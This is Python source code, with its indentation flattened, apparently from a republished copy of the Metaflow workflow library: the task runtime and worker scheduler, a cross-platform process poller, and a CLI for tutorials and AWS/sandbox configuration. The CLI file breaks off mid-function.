progress_tstamp = time.time()
msg = "%d tasks are running: %s." %\
(self._num_active_workers, 'e.g. ...') # TODO
self._logger(msg, system_msg=True)
msg = "%d tasks are waiting in the queue." %\
len(self._run_queue)
self._logger(msg, system_msg=True)
msg = "%d steps are pending: %s." %\
(0, 'e.g. ...') # TODO
self._logger(msg, system_msg=True)
except KeyboardInterrupt as ex:
self._logger('Workflow interrupted.', system_msg=True, bad=True)
self._killall()
exception = ex
raise
except Exception as ex:
self._logger('Workflow failed.', system_msg=True, bad=True)
self._killall()
exception = ex
raise
finally:
# on finish clean tasks
for step in self._flow:
for deco in step.decorators:
deco.runtime_finished(exception)
# assert that end was executed and it was successful
if ('end', ()) in self._finished:
self._logger('Done!', system_msg=True)
else:
raise MetaflowInternalError('The *end* step was not successful '
'by the end of flow.')
def _killall(self):
for worker in self._workers.values():
worker.kill()
# give killed workers a chance to flush their logs to datastore
for _ in range(3):
list(self._poll_workers())
# Store the parameters needed for task creation, so that pushing on items
# onto the run_queue is an inexpensive operation.
def _queue_push(self, step, task_kwargs):
self._run_queue.insert(0, (step, task_kwargs))
def _queue_pop(self):
return self._run_queue.pop() if self._run_queue else None
def _queue_task_join(self, task, next_steps):
# if the next step is a join, we need to check that
# all input tasks for the join have finished before queuing it.
# CHECK: this condition should be enforced by the linter but
# let's assert that the assumption holds
if len(next_steps) > 1:
msg = 'Step *{step}* transitions to a join and another '\
'step. The join must be the only transition.'
raise MetaflowInternalError(task, msg.format(step=task.step))
else:
next_step = next_steps[0]
# matching_split is the split-parent of the finished task
matching_split = self._graph[self._graph[next_step].split_parents[-1]]
step_name, foreach_stack = task.finished_id
if matching_split.type == 'foreach':
# next step is a foreach join
def siblings(foreach_stack):
top = foreach_stack[-1]
bottom = list(foreach_stack[:-1])
for index in range(top.num_splits):
yield tuple(bottom + [top._replace(index=index)])
# required tasks are all split-siblings of the finished task
required_tasks = [self._finished.get((task.step, s))
for s in siblings(foreach_stack)]
join_type = 'foreach'
else:
# next step is a split-and
# required tasks are all branches joined by the next step
required_tasks = [self._finished.get((step, foreach_stack))
for step in self._graph[next_step].in_funcs]
join_type = 'linear'
if all(required_tasks):
# all tasks to be joined are ready. Schedule the next join step.
self._queue_push(next_step,
{'input_paths': required_tasks,
'join_type': join_type})
def _queue_task_foreach(self, task, next_steps):
# CHECK: this condition should be enforced by the linter but
# let's assert that the assumption holds
if len(next_steps) > 1:
msg = 'Step *{step}* makes a foreach split but it defines '\
'multiple transitions. Specify only one transition '\
'for foreach.'
raise MetaflowInternalError(msg.format(step=task.step))
else:
next_step = next_steps[0]
num_splits = task.results['_foreach_num_splits']
if num_splits > self._max_num_splits:
msg = 'Foreach in step *{step}* yielded {num} child steps '\
'which is more than the current maximum of {max} '\
'children. You can raise the maximum with the '\
'--max-num-splits option. '
raise TaskFailed(task, msg.format(step=task.step,
num=num_splits,
max=self._max_num_splits))
# schedule all splits
for i in range(num_splits):
self._queue_push(next_step,
{'split_index': str(i),
'input_paths': [task.path]})
def _queue_tasks(self, finished_tasks):
# finished tasks include only successful tasks
for task in finished_tasks:
self._finished[task.finished_id] = task.path
self._is_cloned[task.path] = task.is_cloned
# CHECK: ensure that runtime transitions match with
# statically inferred transitions
trans = task.results.get('_transition')
if trans:
next_steps = trans[0]
foreach = trans[1]
else:
next_steps = []
foreach = None
expected = self._graph[task.step].out_funcs
if next_steps != expected:
msg = 'Based on static analysis of the code, step *{step}* '\
'was expected to transition to step(s) *{expected}*. '\
'However, when the code was executed, self.next() was '\
'called with *{actual}*. Make sure there is only one '\
'unconditional self.next() call in the end of your '\
'step. '
raise MetaflowInternalError(msg.format(step=task.step,
expected=', '.join(
expected),
actual=', '.join(next_steps)))
# Different transition types require different treatment
if any(self._graph[f].type == 'join' for f in next_steps):
# Next step is a join
self._queue_task_join(task, next_steps)
elif foreach:
# Next step is a foreach child
self._queue_task_foreach(task, next_steps)
else:
# Next steps are normal linear steps
for step in next_steps:
self._queue_push(step, {'input_paths': [task.path]})
def _poll_workers(self):
if self._workers:
for event in self._poll.poll(PROGRESS_INTERVAL):
worker = self._workers.get(event.fd)
if worker:
if event.can_read:
worker.read_logline(event.fd)
if event.is_terminated:
returncode = worker.terminate()
for fd in worker.fds():
self._poll.remove(fd)
del self._workers[fd]
self._num_active_workers -= 1
task = worker.task
if returncode:
# worker did not finish successfully
if worker.killed or\
returncode == METAFLOW_EXIT_DISALLOW_RETRY:
self._logger("This failed task will not be "
"retried.", system_msg=True)
else:
if task.retries < task.user_code_retries +\
task.error_retries:
self._retry_worker(worker)
else:
raise TaskFailed(task)
else:
# worker finished successfully
yield task
def _launch_workers(self):
while self._run_queue and self._num_active_workers < self._max_workers:
step, task_kwargs = self._queue_pop()
# Initialize the task (which can be expensive using remote datastores)
# before launching the worker so that cost is amortized over time, instead
# of doing it during _queue_push.
task = self._new_task(step, **task_kwargs)
self._launch_worker(task)
def _retry_worker(self, worker):
worker.task.retries += 1
if worker.task.retries >= MAX_ATTEMPTS:
# any results with an attempt ID >= MAX_ATTEMPTS will be ignored
# by datastore, so running a task with such a retry_could would
# be pointless and dangerous
raise MetaflowInternalError("Too many task attempts (%d)! "
"MAX_ATTEMPTS exceeded."
% worker.task.retries)
worker.task.new_attempt()
self._launch_worker(worker.task)
def _launch_worker(self, task):
worker = Worker(task, self._max_log_size)
for fd in worker.fds():
self._workers[fd] = worker
self._poll.add(fd)
self._num_active_workers += 1
class Task(object):
clone_pathspec_mapping = {}
def __init__(self,
datastore,
flow,
step,
run_id,
metadata,
environment,
entrypoint,
event_logger,
monitor,
input_paths=None,
split_index=None,
clone_run_id=None,
origin_ds_set=None,
may_clone=False,
join_type=None,
logger=None,
task_id=None,
decos=[]):
if task_id is None:
task_id = str(metadata.new_task_id(run_id, step))
else:
# task_id is preset only by persist_parameters()
metadata.register_task_id(run_id, step, task_id)
self.step = step
self.flow_name = flow.name
self.run_id = run_id
self.task_id = task_id
self.input_paths = input_paths
self.split_index = split_index
self.decos = decos
self.entrypoint = entrypoint
self.environment = environment
self.environment_type = self.environment.TYPE
self.clone_run_id = clone_run_id
self.clone_origin = None
self.origin_ds_set = origin_ds_set
self.metadata = metadata
self.event_logger = event_logger
self.monitor = monitor
self._logger = logger
self._path = '%s/%s/%s' % (self.run_id, self.step, self.task_id)
self.retries = 0
self.user_code_retries = 0
self.error_retries = 0
self.tags = metadata.sticky_tags
self.event_logger_type = self.event_logger.logger_type
self.monitor_type = monitor.monitor_type
self.metadata_type = metadata.TYPE
self.datastore_type = datastore.TYPE
self._datastore = datastore
self.datastore_sysroot = datastore.datastore_root
self._results_ds = None
if clone_run_id and may_clone:
self._is_cloned = self._attempt_clone(clone_run_id, join_type)
else:
self._is_cloned = False
# Open the output datastore only if the task is not being cloned.
if not self._is_cloned:
self.new_attempt()
for deco in decos:
deco.runtime_task_created(self._ds,
task_id,
split_index,
input_paths,
self._is_cloned)
# determine the number of retries of this task
user_code_retries, error_retries = deco.step_task_retry_count()
self.user_code_retries = max(self.user_code_retries,
user_code_retries)
self.error_retries = max(self.error_retries, error_retries)
def new_attempt(self):
self._ds = self._datastore(self.flow_name,
run_id=self.run_id,
step_name=self.step,
task_id=self.task_id,
mode='w',
metadata=self.metadata,
attempt=self.retries,
event_logger=self.event_logger,
monitor=self.monitor)
def log(self, msg, system_msg=False, pid=None):
if pid:
prefix = '[%s (pid %s)] ' % (self._path, pid)
else:
prefix = '[%s] ' % self._path
self._logger(msg, head=prefix, system_msg=system_msg)
sys.stdout.flush()
def _find_origin_task(self, clone_run_id, join_type):
if self.step == '_parameters':
pathspec = '%s/_parameters[]' % clone_run_id
origin = self.origin_ds_set.get_with_pathspec_index(pathspec)
if origin is None:
# This is just for usability: We could rerun the whole flow
# if an unknown clone_run_id is provided but probably this is
# not what the user intended, so raise a warning
raise MetaflowException("Resume could not find run id *%s*" %
clone_run_id)
else:
return origin
else:
# all inputs must have the same foreach stack, so we can safely
# pick the first one
parent_pathspec = self.input_paths[0]
origin_parent_pathspec = \
self.clone_pathspec_mapping[parent_pathspec]
parent = self.origin_ds_set.get_with_pathspec(origin_parent_pathspec)
# Parent should be non-None since only clone the child if the parent
# was successfully cloned.
foreach_stack = parent['_foreach_stack']
if join_type == 'foreach':
# foreach-join pops the topmost index
index = ','.join(str(s.index) for s in foreach_stack[:-1])
elif self.split_index:
# foreach-split pushes a new index
index = ','.join([str(s.index) for s in foreach_stack] +
[str(self.split_index)])
else:
# all other transitions keep the parent's foreach stack intact
index = ','.join(str(s.index) for s in foreach_stack)
pathspec = '%s/%s[%s]' % (clone_run_id, self.step, index)
return self.origin_ds_set.get_with_pathspec_index(pathspec)
def _attempt_clone(self, clone_run_id, join_type):
origin = self._find_origin_task(clone_run_id, join_type)
if origin and origin['_task_ok']:
# Store the mapping from current_pathspec -> origin_pathspec which
# will be useful for looking up origin_ds_set in find_origin_task.
self.clone_pathspec_mapping[self._path] = origin.pathspec
if self.step == '_parameters':
# Clone in place without relying on run_queue.
self.new_attempt()
self._ds.clone(origin)
self._ds.done()
else:
self.log("Cloning results of a previously run task %s"
% origin.pathspec, system_msg=True)
# Store the origin pathspec in clone_origin so this can be run
# as a task by the runtime.
self.clone_origin = origin.pathspec
# Save a call to creating the results_ds since its same as origin.
self._results_ds = origin
return True
else:
return False
@property
def path(self):
return self._path
@property
def results(self):
if self._results_ds:
return self._results_ds
else:
self._results_ds = self._datastore(self.flow_name,
run_id=self.run_id,
step_name=self.step,
task_id=self.task_id,
mode='r',
metadata=self.metadata,
event_logger=self.event_logger,
monitor=self.monitor)
return self._results_ds
@property
def finished_id(self):
# note: id is not available before the task has finished
return (self.step, tuple(self.results['_foreach_stack']))
@property
def is_cloned(self):
return self._is_cloned
def persist(self, flow):
# this is used to persist parameters before the start step
flow._task_ok = flow._success = True
flow._foreach_stack = []
self._ds.persist(flow)
self._ds.done()
def save_logs(self, logtype, logs):
location = self._ds.save_log(logtype, logs)
datum = [MetaDatum(field='log_location_%s' % logtype,
value=json.dumps({
'ds_type': self._ds.TYPE,
'location': location,
'attempt': self.retries}),
type='log_path')]
self.metadata.register_metadata(self.run_id,
self.step,
self.task_id,
datum)
return location
def save_metadata(self, name, metadata):
self._ds.save_metadata(name, metadata)
def __str__(self):
return ' '.join(self._args)
class TaskFailed(MetaflowException):
headline = "Step failure"
def __init__(self, task, msg=''):
body = "Step *%s* (task-id %s) failed" % (task.step,
task.task_id)
if msg:
body = '%s: %s' % (body, msg)
else:
body += '.'
super(TaskFailed, self).__init__(body)
class TruncatedBuffer(object):
def __init__(self, name, maxsize):
self.name = name
self._maxsize = maxsize
self._buffer = BytesIO()
self._size = 0
self._eof = False
def write(self, bytedata, system_msg=False):
if system_msg:
self._buffer.write(bytedata)
elif not self._eof:
if self._size + len(bytedata) < self._maxsize:
self._buffer.write(bytedata)
self._size += len(bytedata)
else:
msg = b'[TRUNCATED - MAXIMUM LOG FILE SIZE REACHED]\n'
self._buffer.write(msg)
self._eof = True
def get_bytes(self):
return self._buffer.getvalue()
class CLIArgs(object):
"""
Container to allow decorators modify the command line parameters
for step execution in StepDecorator.runtime_step_cli().
"""
def __init__(self, task):
self.task = task
self.entrypoint = list(task.entrypoint)
self.top_level_options = {
'quiet': True,
'coverage': 'coverage' in sys.modules,
'metadata': self.task.metadata_type,
'environment': self.task.environment_type,
'datastore': self.task.datastore_type,
'event-logger': self.task.event_logger_type,
'monitor': self.task.monitor_type,
'datastore-root': self.task.datastore_sysroot,
'with': [deco.make_decorator_spec() for deco in self.task.decos
if not deco.statically_defined]
}
self.commands = ['step']
self.command_args = [self.task.step]
self.command_options = {
'run-id': task.run_id,
'task-id': task.task_id,
'input-paths': compress_list(task.input_paths),
'split-index': task.split_index,
'retry-count': task.retries,
'max-user-code-retries': task.user_code_retries,
'tag': task.tags,
'namespace': get_namespace() or ''
}
self.env = {}
def get_args(self):
def options(mapping):
for k, v in mapping.items():
values = v if isinstance(v, list) else [v]
for value in values:
if value:
yield '--%s' % k
if not isinstance(value, bool):
yield to_unicode(value)
args = list(self.entrypoint)
args.extend(options(self.top_level_options))
args.extend(self.commands)
args.extend(self.command_args)
args.extend(options(self.command_options))
return args
def get_env(self):
return self.env
def __str__(self):
return ' '.join(self.get_args())
class Worker(object):
def __init__(self, task, max_logs_size):
self.task = task
self._proc = self._launch()
if task.retries > task.user_code_retries:
self.task.log('Task fallback is starting to handle the failure.',
system_msg=True,
pid=self._proc.pid)
elif not task.is_cloned:
suffix = ' (retry).' if task.retries else '.'
self.task.log('Task is starting' + suffix,
system_msg=True,
pid=self._proc.pid)
self._stdout = TruncatedBuffer('stdout', max_logs_size)
self._stderr = TruncatedBuffer('stderr', max_logs_size)
self._logs = {self._proc.stderr.fileno(): (self._proc.stderr,
self._stderr),
self._proc.stdout.fileno(): (self._proc.stdout,
self._stdout)}
self._encoding = sys.stdout.encoding or 'UTF-8'
self.killed = False
def _launch(self):
args = CLIArgs(self.task)
env = dict(os.environ)
if self.task.clone_run_id:
args.command_options['clone-run-id'] = self.task.clone_run_id
if self.task.is_cloned and self.task.clone_origin:
args.command_options['clone-only'] = self.task.clone_origin
# disabling atlas sidecar for cloned tasks due to perf reasons
args.top_level_options['monitor'] = 'nullSidecarMonitor'
else:
# decorators may modify the CLIArgs object in-place
for deco in self.task.decos:
deco.runtime_step_cli(args,
self.task.retries,
self.task.user_code_retries)
env.update(args.get_env())
# the env vars are needed by the test framework, nothing else
env['_METAFLOW_ATTEMPT'] = str(self.task.retries)
if self.task.clone_run_id:
env['_METAFLOW_RESUMED_RUN'] = '1'
env['_METAFLOW_RESUME_ORIGIN_RUN_ID'] = str(self.task.clone_run_id)
# NOTE bufsize=1 below enables line buffering which is required
# by read_logline() below that relies on readline() not blocking
# print('running', args)
cmdline = args.get_args()
debug.subcommand_exec(cmdline)
return subprocess.Popen(cmdline,
env=env,
bufsize=1,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
def write(self, msg, buf):
buf.write(msg)
text = msg.strip().decode(self._encoding, errors='replace')
self.task.log(text, pid=self._proc.pid)
def read_logline(self, fd):
fileobj, buf = self._logs[fd]
# readline() below should never block thanks to polling and
# line buffering. If it does, things will deadlock
line = fileobj.readline()
if line:
self.write(line, buf)
return True
else:
return False
def fds(self):
return (self._proc.stderr.fileno(),
self._proc.stdout.fileno())
def kill(self):
if not self.killed:
for fileobj, buf in self._logs.values():
buf.write(b'[KILLED BY ORCHESTRATOR]\n', system_msg=True)
try:
# wait for the process to clean up after itself
select.poll().poll(1000)
self._proc.kill()
except:
pass
self.killed = True
def terminate(self):
# this shouldn't block, since terminate() is called only
# after the poller has decided that the worker is dead
returncode = self._proc.wait()
# consume all remaining loglines
# we set the file descriptor to be non-blocking, since
# the pipe may stay active due to subprocesses launched by
# the worker, e.g. sidecars, so we can't rely on EOF. We try to
# read just what's available in the pipe buffer
for fileobj, buf in self._logs.values():
fileno = fileobj.fileno()
fcntl.fcntl(fileno, fcntl.F_SETFL, os.O_NONBLOCK)
try:
while self.read_logline(fileno):
pass
except:
# ignore "resource temporarily unavailable" etc. errors
# caused due to non-blocking. Draining is done on a
# best-effort basis.
pass
# Return early if the task is cloned since we don't want to
# perform any log collection.
if not self.task.is_cloned:
self.task.save_logs('stdout', self._stdout.get_bytes())
self.task.save_logs('stderr', self._stderr.get_bytes())
self.task.save_metadata('runtime', {'return_code': returncode,
'killed': self.killed,
'success': returncode == 0})
if returncode:
if not self.killed:
self.task.log('Task failed.',
system_msg=True,
pid=self._proc.pid)
else:
num = self.task.results['_foreach_num_splits']
if num:
self.task.log('Foreach yields %d child steps.' % num,
system_msg=True,
pid=self._proc.pid)
self.task.log('Task finished successfully.',
system_msg=True,
pid=self._proc.pid)
return returncode
def __str__(self):
return 'Worker[%d]: %s' % (self._proc.pid, self.task.path) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/runtime.py | runtime.py |
import platform
import select
class ProcPollEvent(object):
def __init__(self, fd, can_read=False, is_terminated=False):
self.fd = fd
self.can_read = can_read
self.is_terminated = is_terminated
class ProcPoll(object):
def poll(self):
raise NotImplementedError()
def add(self, fd):
raise NotImplementedError()
def remove(self, fd):
raise NotImplementedError()
class LinuxProcPoll(ProcPoll):
def __init__(self):
self._poll = select.poll()
def add(self, fd):
self._poll.register(fd, select.POLLIN |
select.POLLERR |
select.POLLHUP)
def remove(self, fd):
self._poll.unregister(fd)
def poll(self, timeout):
for (fd, event) in self._poll.poll(timeout):
yield ProcPollEvent(fd=fd,
can_read=bool(event & select.POLLIN),
is_terminated=bool(event & select.POLLHUP) or
bool(event & select.POLLERR))
class DarwinProcPoll(ProcPoll):
def __init__(self):
self._kq = select.kqueue()
def add(self, fd):
ev = select.kevent(fd,
filter=select.KQ_FILTER_READ,
flags=select.KQ_EV_ADD)
self._kq.control([ev], 0, 0)
def remove(self, fd):
ev = select.kevent(fd,
flags=select.KQ_EV_DELETE)
self._kq.control([ev], 0, 0)
def poll(self, timeout):
for event in self._kq.control(None, 100, timeout):
yield ProcPollEvent(fd=event.ident,
can_read=True,
is_terminated=event.flags & select.KQ_EV_EOF)
def make_poll():
os = platform.system()
if os == 'Linux':
return LinuxProcPoll()
elif os == 'Darwin':
return DarwinProcPoll()
else:
raise Exception("Polling is not supported on "
"your operating system (%s)" % os)
if __name__ == '__main__':
import subprocess
p1 = subprocess.Popen(['bash', '-c',
'for ((i=0;i<10;i++)); '
'do echo "first $i"; sleep 1; done'],
bufsize=1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
p2 = subprocess.Popen(['bash', '-c',
'for ((i=0;i<5;i++)); '
'do echo "second $i"; sleep 2; done'],
bufsize=1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
fds = {p1.stdout.fileno(): ('p1', p1.stdout),
p2.stdout.fileno(): ('p2', p2.stdout)}
poll = make_poll()
print('poller is %s' % poll)
for fd in fds:
poll.add(fd)
n = 2
while n > 0:
for event in poll.poll(0.5):
name, fileobj = fds[event.fd]
print('[%s] %s' % (name, fileobj.readline().strip()))
if event.is_terminated:
print('[%s] terminated' % name)
poll.remove(event.fd)
n -= 1 | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/procpoll.py | procpoll.py |
import click
import json
import os
import shutil
from os.path import expanduser
from metaflow.datastore.local import LocalDataStore
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR, DEFAULT_METADATA
def makedirs(path):
# This is for python2 compatibility.
# Python3 has os.makedirs(exist_ok=True).
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def echo_dev_null(*args, **kwargs):
pass
def echo_always(line, **kwargs):
click.secho(line, **kwargs)
@click.group(invoke_without_command=True)
@click.pass_context
def main(ctx):
global echo
echo = echo_always
import metaflow
echo('Metaflow ',
fg='magenta',
bold=True,
nl=False)
if ctx.invoked_subcommand is None:
echo('(%s): ' % metaflow.__version__,
fg='magenta',
bold=False,
nl=False)
else:
echo('(%s)\n' % metaflow.__version__,
fg='magenta',
bold=False)
if ctx.invoked_subcommand is None:
echo("More data science, less engineering\n",
fg='magenta')
# metaflow URL
echo('http://docs.metaflow.org', fg='cyan', nl=False)
echo(' - Find the documentation')
# metaflow chat
echo('http://chat.metaflow.org', fg='cyan', nl=False)
echo(' - Chat with us')
# metaflow help email
echo('[email protected]', fg='cyan', nl=False)
echo(' - Get help by email\n')
# print a short list of next steps.
short_help = {'tutorials': 'Browse and access metaflow tutorials.',
'configure': 'Configure metaflow to run remotely.',
'status': 'Display the current working tree.',
'help': 'Shows all available commands to run.'}
echo('Commands:', bold=False)
for cmd, desc in short_help.items():
echo(' metaflow {0:<10} '.format(cmd),
fg='cyan',
bold=False,
nl=False)
echo('%s' % desc)
@main.command(help='Show all available commands.')
@click.pass_context
def help(ctx):
print(ctx.parent.get_help())
@main.command(help='Shows flows accessible from the current working tree.')
def status():
from metaflow.client import get_metadata
res = get_metadata()
if res:
res = res.split('@')
else:
raise click.ClickException('Unknown status: cannot find a Metadata provider')
if res[0] == 'service':
echo('Using Metadata provider at: ', nl=False)
echo('"%s"\n' % res[1], fg='cyan')
echo('To list available flows, type:\n')
echo('1. python')
echo('2. from metaflow import Metaflow')
echo('3. list(Metaflow())')
return
from metaflow.client import namespace, metadata, Metaflow
# Get the local data store path
path = LocalDataStore.get_datastore_root_from_config(echo,
create_on_absent=False)
# Throw an exception
if path is None:
raise click.ClickException("Could not find " +\
click.style('"%s"' % DATASTORE_LOCAL_DIR,
fg='red') +\
" in the current working tree.")
stripped_path = os.path.dirname(path)
namespace(None)
metadata('local@%s' % stripped_path)
echo('Working tree found at: ', nl=False)
echo('"%s"\n' % stripped_path, fg='cyan')
echo('Available flows:', fg='cyan', bold=True)
for flow in Metaflow():
echo('* %s' % flow, fg='cyan')
@main.group(help="Browse and access the metaflow tutorial episodes.")
def tutorials():
pass
def get_tutorials_dir():
metaflow_dir = os.path.dirname(__file__)
package_dir = os.path.dirname(metaflow_dir)
tutorials_dir = os.path.join(package_dir, 'metaflow', 'tutorials')
return tutorials_dir
def get_tutorial_metadata(tutorial_path):
metadata = {}
with open(os.path.join(tutorial_path, 'README.md')) as readme:
content = readme.read()
paragraphs = [paragraph.strip() \
for paragraph \
in content.split('#') if paragraph]
metadata['description'] = paragraphs[0].split('**')[1]
header = paragraphs[0].split('\n')
header = header[0].split(':')
metadata['episode'] = header[0].strip()[len('Episode '):]
metadata['title'] = header[1].strip()
for paragraph in paragraphs[1:]:
if paragraph.startswith('Before playing'):
lines = '\n'.join(paragraph.split('\n')[1:])
metadata['prereq'] = lines.replace('```', '')
if paragraph.startswith('Showcasing'):
lines = '\n'.join(paragraph.split('\n')[1:])
metadata['showcase'] = lines.replace('```', '')
if paragraph.startswith('To play'):
lines = '\n'.join(paragraph.split('\n')[1:])
metadata['play'] = lines.replace('```', '')
return metadata
def get_all_episodes():
episodes = []
for name in sorted(os.listdir(get_tutorials_dir())):
# Skip hidden files (like .gitignore)
if not name.startswith('.'):
episodes.append(name)
return episodes
@tutorials.command(help="List the available episodes.")
def list():
echo('Episodes:', fg='cyan', bold=True)
for name in get_all_episodes():
path = os.path.join(get_tutorials_dir(), name)
metadata = get_tutorial_metadata(path)
echo('* {0: <20} '.format(metadata['episode']),
fg='cyan',
nl=False)
echo('- {0}'.format(metadata['title']))
echo('\nTo pull the episodes, type: ')
echo('metaflow tutorials pull', fg='cyan')
def validate_episode(episode):
src_dir = os.path.join(get_tutorials_dir(), episode)
if not os.path.isdir(src_dir):
raise click.BadArgumentUsage("Episode " + \
click.style("\"{0}\"".format(episode),
fg='red') + " does not exist."\
" To see a list of available episodes, "\
"type:\n" + \
click.style("metaflow tutorials list",
fg='cyan'))
def autocomplete_episodes(ctx, args, incomplete):
return [k for k in get_all_episodes() if incomplete in k]
@tutorials.command(help="Pull episodes "\
"into your current working directory.")
@click.option('--episode', default="", help="Optional episode name "\
"to pull only a single episode.")
def pull(episode):
tutorials_dir = get_tutorials_dir()
if not episode:
episodes = get_all_episodes()
else:
episodes = list(episodes)
# Validate that the list is valid.
for episode in episodes:
validate_episode(episode)
# Create destination `metaflow-tutorials` dir.
dst_parent = os.path.join(os.getcwd(), 'metaflow-tutorials')
makedirs(dst_parent)
# Pull specified episodes.
for episode in episodes:
dst_dir = os.path.join(dst_parent, episode)
# Check if episode has already been pulled before.
if os.path.exists(dst_dir):
if click.confirm("Episode " + \
click.style("\"{0}\"".format(episode), fg='red') +\
" has already been pulled before. Do you wish "\
"to delete the existing version?"):
shutil.rmtree(dst_dir)
else:
continue
echo('Pulling episode ', nl=False)
echo('\"{0}\"'.format(episode), fg='cyan', nl=False)
# TODO: Is the following redudant?
echo(' into your current working directory.')
# Copy from (local) metaflow package dir to current.
src_dir = os.path.join(tutorials_dir, episode)
shutil.copytree(src_dir, dst_dir)
echo('\nTo know more about an episode, type:\n', nl=False)
echo('metaflow tutorials info [EPISODE]', fg='cyan')
@tutorials.command(help='Find out more about an episode.')
@click.argument('episode', autocompletion=autocomplete_episodes)
def info(episode):
validate_episode(episode)
src_dir = os.path.join(get_tutorials_dir(), episode)
metadata = get_tutorial_metadata(src_dir)
echo('Synopsis:', fg='cyan', bold=True)
echo('%s' % metadata['description'])
echo('\nShowcasing:', fg='cyan', bold=True, nl=True)
echo('%s' % metadata['showcase'])
if 'prereq' in metadata:
echo('\nBefore playing:', fg='cyan', bold=True, nl=True)
echo('%s' % metadata['prereq'])
echo('\nTo play:', fg='cyan', bold=True)
echo('%s' % metadata['play'])
# NOTE: This code needs to be in sync with metaflow/metaflow_config.py.
METAFLOW_CONFIGURATION_DIR =\
expanduser(os.environ.get('METAFLOW_HOME', '~/.metaflowconfig'))
@main.group(help="Configure Metaflow to "\
"run on our sandbox or an AWS account.")
def configure():
makedirs(METAFLOW_CONFIGURATION_DIR)
def get_config_path(profile):
config_file = 'config.json' if not profile else ('config_%s.json' % profile)
path = os.path.join(METAFLOW_CONFIGURATION_DIR, config_file)
return path
def prompt_config_overwrite(profile):
path = get_config_path(profile)
if os.path.exists(path):
if click.confirm('Do you wish to overwrite the existing configuration '
'in ' + click.style('"%s"' % path, fg='cyan') + '?',
abort=True):
return
def persist_env(env_dict, profile):
# TODO: Should we persist empty env_dict or notify user differently?
path = get_config_path(profile)
with open(path, 'w') as f:
json.dump(env_dict, f)
echo('\nConfiguration successfully written to ', nl=False)
echo('"%s"' % path, fg='cyan')
@configure.command(help='Resets the configuration to run locally.')
@click.option('--profile', '-p', default='',
help="Optional user profile to allow storing multiple "
"configurations. Please `export METAFLOW_PROFILE` to "
"switch between profile configuration(s).")
def reset(profile):
path = get_config_path(profile)
if os.path.exists(path):
if click.confirm('Do you really wish to reset the configuration in ' +\
click.style('"%s"' % path, fg='cyan'), abort=True):
os.remove(path)
echo('Configuration successfully reset to run locally.')
else:
echo('Configuration is already reset to run locally.')
@configure.command(help='Shows the existing configuration.')
@click.option('--profile', '-p', default='',
help="Optional user profile to allow storing multiple "
"configurations. Please `export METAFLOW_PROFILE` to "
"switch between profile configuration(s).")
def show(profile):
path = get_config_path(profile)
env_dict = {}
if os.path.exists(path):
with open(path, 'r') as f:
env_dict = json.load(f)
if env_dict:
echo('Showing configuration in ', nl=False)
echo('"%s"\n' % path, fg='cyan')
for k,v in env_dict.items():
echo('%s=%s' % (k, v))
else:
echo('Configuration is set to run locally.')
@configure.command(help='Get Metaflow up and running on our sandbox.')
@click.option('--profile', '-p', default='',
help="Optional user profile to allow storing multiple "
"configurations. Please `export METAFLOW_PROFILE` to "
"switch between profile configuration(s).")
def sandbox(profile):
prompt_config_overwrite(profile)
# Prompt for user input.
encoded_str = click.prompt('Following instructions from '
'https://metaflow.org/sandbox, '
'please paste the encoded magic string',
type=str)
# Decode the bytes to env_dict.
try:
import base64, zlib
from metaflow.util import to_bytes
env_dict =\
json.loads(zlib.decompress(base64.b64decode(to_bytes(encoded_str))))
except:
# TODO: Add the URL for contact us page in the error?
raise click.BadArgumentUsage('Could not decode the sandbox '\
'configuration. Please contact us.')
# Persist to a file.
persist_env(env_dict, profile)
@configure.command(help='Get Metaflow up and running on your own AWS environment.')
@click.option('--profile', '-p', default='',
help="Optional user profile to allow storing multiple "
"configurations. Please `export METAFLOW_PROFILE` to "
"switch between profile configuration(s).")
def aws(profile):
prompt_config_overwrite(profile)
if click.confirm('Have you setup your ' +\
click.style('AWS credentials?', fg='cyan')):
env_dict = {}
# Datastore configuration.
use_s3 = click.confirm('\nDo you want to use AWS S3 as your datastore?',
default=True, abort=False)
if use_s3:
echo('\tAWS S3', fg='cyan')
datastore_s3_root =\
click.prompt('\tPlease enter the bucket prefix to use for your '
'flows')
datatools_s3_root =\
click.prompt('\tPlease enter the bucket prefix to use for your '
'data',
default='%s/data' % datastore_s3_root)
env_dict['METAFLOW_DEFAULT_DATASTORE'] = 's3'
env_dict['METAFLOW_DATASTORE_SYSROOT_S3'] = datastore_s3_root
env_dict['METAFLOW_DATATOOLS_SYSROOT_S3'] = datatools_s3_root
# Batch configuration (only if S3 is being used).
use_batch =\
click.confirm('\nDo you want to use AWS Batch for compute?',
default=True, abort=False)
if use_batch:
echo('\n\tAWS Batch', fg='cyan')
job_queue = click.prompt('\tPlease enter the job queue to use '
'for batch')
default_image =\
click.prompt('\tPlease enter the default container image '
'to use')
container_registry =\
click.prompt('\tPlease enter the container registry')
ecs_s3_role =\
click.prompt('\tPlease enter the IAM role to use for the '
'container to get AWS S3 access')
env_dict['METAFLOW_BATCH_JOB_QUEUE'] = job_queue
env_dict['METAFLOW_BATCH_CONTAINER_IMAGE'] = default_image
env_dict['METAFLOW_BATCH_CONTAINER_REGISTRY'] =\
container_registry
env_dict['METAFLOW_ECS_S3_ACCESS_IAM_ROLE'] = ecs_s3_role
# Metadata service configuration.
use_metadata = click.confirm('\nDo you want to use a (remote) metadata '
'service?', default=True, abort=False)
if use_metadata:
echo('\tMetadata service', fg='cyan')
service_url = click.prompt('\tPlease enter the URL for your '
'metadata service')
env_dict['METAFLOW_DEFAULT_METADATA'] = 'service'
env_dict['METADATA_SERVICE_URL'] = service_url
# Conda (on S3) configuration.
if use_s3:
use_conda = click.confirm('\nDo you want to use conda for '
'dependency management?',
default=True, abort=False)
if use_conda:
echo('\tConda on AWS S3', fg='cyan')
default_val =\
'%s/conda' % env_dict['METAFLOW_DATASTORE_SYSROOT_S3']
package_s3root = \
click.prompt('\tPlease enter the bucket prefix for storing '
'conda packages',
default=default_val)
env_dict['METAFLOW_CONDA_PACKAGE_S3ROOT'] = package_s3root
persist_env(env_dict, profile)
else:
